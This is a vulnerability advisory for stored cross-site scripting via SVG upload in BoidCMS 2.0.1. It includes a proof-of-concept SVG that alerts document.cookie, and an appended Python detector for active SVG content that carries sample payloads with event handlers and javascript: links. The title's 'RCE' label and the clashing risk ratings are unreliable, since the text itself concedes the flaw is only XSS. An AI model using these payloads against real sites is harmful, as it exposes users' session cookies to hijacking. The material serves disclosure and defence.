BoidCMS-2.0.1 - FileUpload - RCE - PHPSESSID HIJACKING

2023.10.13
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

## Title: BoidCMS-2.0.1 - FileUpload - RCE - PHPSESSID HIJACKING
## Author: nu11secur1ty
## Date: 10/13/2023
## Vendor: https://boidcms.github.io/#/
## Software: https://github.com/BoidCMS/BoidCMS/releases/tag/v2.0.1
## Reference: https://portswigger.net/web-security/file-upload
## LAB: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:
The file-upload feature of BoidCMS 2.0.1 accepts SVG files from an authenticated user and serves them back from the site's own origin without stripping active content. Because SVG is XML, the file may carry a `<script>` element, so the attack takes two parties: the first has valid credentials, uploads the script-bearing SVG, logs out of the application and passes the file's URL to the second, who distributes the link. Any user who opens that URL in a browser runs the embedded script in the context of the BoidCMS origin; the proof-of-concept below displays `document.cookie`, which discloses the visitor's PHPSESSID to the script if the session cookie is not marked HttpOnly. Two caveats: the payload runs only when the SVG is opened directly (an `<img>` reference renders it without executing scripts), and what the proof-of-concept demonstrates is stored cross-site scripting with session-cookie disclosure, not command execution on the server. The file stays live until an administrator notices and removes it, by which time the cookies of every user who followed the link may have been exposed. The author names this two-party delivery TMITM (Two men in the middle).

STATUS: HIGH - Vulnerability

[+] Exploit:
```svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.cookie);
  </script>
</svg>
```

## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/boidcms/2023/BoidCMS-2.0.1)
## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/10/boidcms-201-fileupload-rce-phpsessid.html)
## Time spent: 01:37:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/, https://cve.mitre.org/index.html, https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty
<http://nu11secur1ty.com/>
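The description above reports that a script-bearing SVG passes through BoidCMS's upload handling unchanged. The check below is an added example, not code from BoidCMS or from the advisory's author: a server-side inspection of an SVG upload that reports `<script>` and other active elements, `on*` event-handler attributes, `javascript:` URLs and SMIL animation of `href`, so that an upload handler can reject the file before storing it. The function name `svg_active_content` is mine, the first sample document is the advisory's proof-of-concept and the other samples are constructed; the example assumes the handler receives the raw file bytes and that serving user SVGs inline is a requirement (otherwise `Content-Disposition: attachment` or a separate upload origin is the simpler control).

```python
"""Inspect an SVG upload for active content before it is stored.

Added example for the BoidCMS 2.0.1 advisory; it is not BoidCMS code.
An upload handler would call svg_active_content() on the raw file bytes
and reject the upload if any findings come back.
"""
import re
import xml.etree.ElementTree as ET

# Elements that execute script or embed arbitrary markup when the SVG is opened directly.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
# SMIL elements that can rewrite an href to a javascript: URL at runtime.
ANIMATION_ELEMENTS = {"animate", "set"}
# URL schemes that execute script when the link or reference is followed.
SCRIPT_SCHEME = re.compile(r"^\s*(?:javascript|vbscript)\s*:", re.IGNORECASE)


def _local_name(qname: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return qname.rsplit("}", 1)[-1]


def svg_active_content(data: bytes) -> list[str]:
    """Return a list of findings; an empty list means no active content was detected."""
    # Expat expands internal entities, which an attacker can abuse for
    # denial of service (billion laughs), so refuse such documents unparsed.
    if re.search(rb"<!ENTITY", data, re.IGNORECASE):
        return ["DOCTYPE declares internal entities"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings = []
    if _local_name(root.tag) != "svg":
        findings.append(f"root element is <{_local_name(root.tag)}>, not <svg>")

    for element in root.iter():
        name = _local_name(element.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in element.attrib.items():
            attr_name = _local_name(attr)
            if attr_name.lower().startswith("on"):
                findings.append(f"event handler {attr_name} on <{name}>")
            elif attr_name in ("href", "src") and SCRIPT_SCHEME.search(value):
                findings.append(f"{attr_name} with script scheme on <{name}>")
            elif name in ANIMATION_ELEMENTS and attr_name == "attributeName" and value.split(":")[-1] == "href":
                findings.append(f"<{name}> animates href")
    return findings


# The advisory's proof-of-concept, reproduced from the page.
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(document.cookie);</script>
</svg>"""

# Constructed samples: a harmless file and one using an event handler plus a javascript: link.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
  <polygon points="0,0 0,50 50,0" fill="#009900"/>
</svg>"""

HANDLER_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">
  <a xlink:href="javascript:alert(document.cookie)"><text y="20">click</text></a>
</svg>"""


if __name__ == "__main__":
    for label, sample in (("poc", POC_SVG), ("benign", BENIGN_SVG), ("handler", HANDLER_SVG)):
        print(label, svg_active_content(sample) or "no active content")
```

Run as a script it prints the findings for each sample. A blocklist of this kind is a second line of defence: the session-hijacking impact described above is also cut off by marking the PHPSESSID cookie HttpOnly, and script execution inside a served SVG by a restrictive Content-Security-Policy header on the upload path.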


Copyright 2024, cxsecurity.com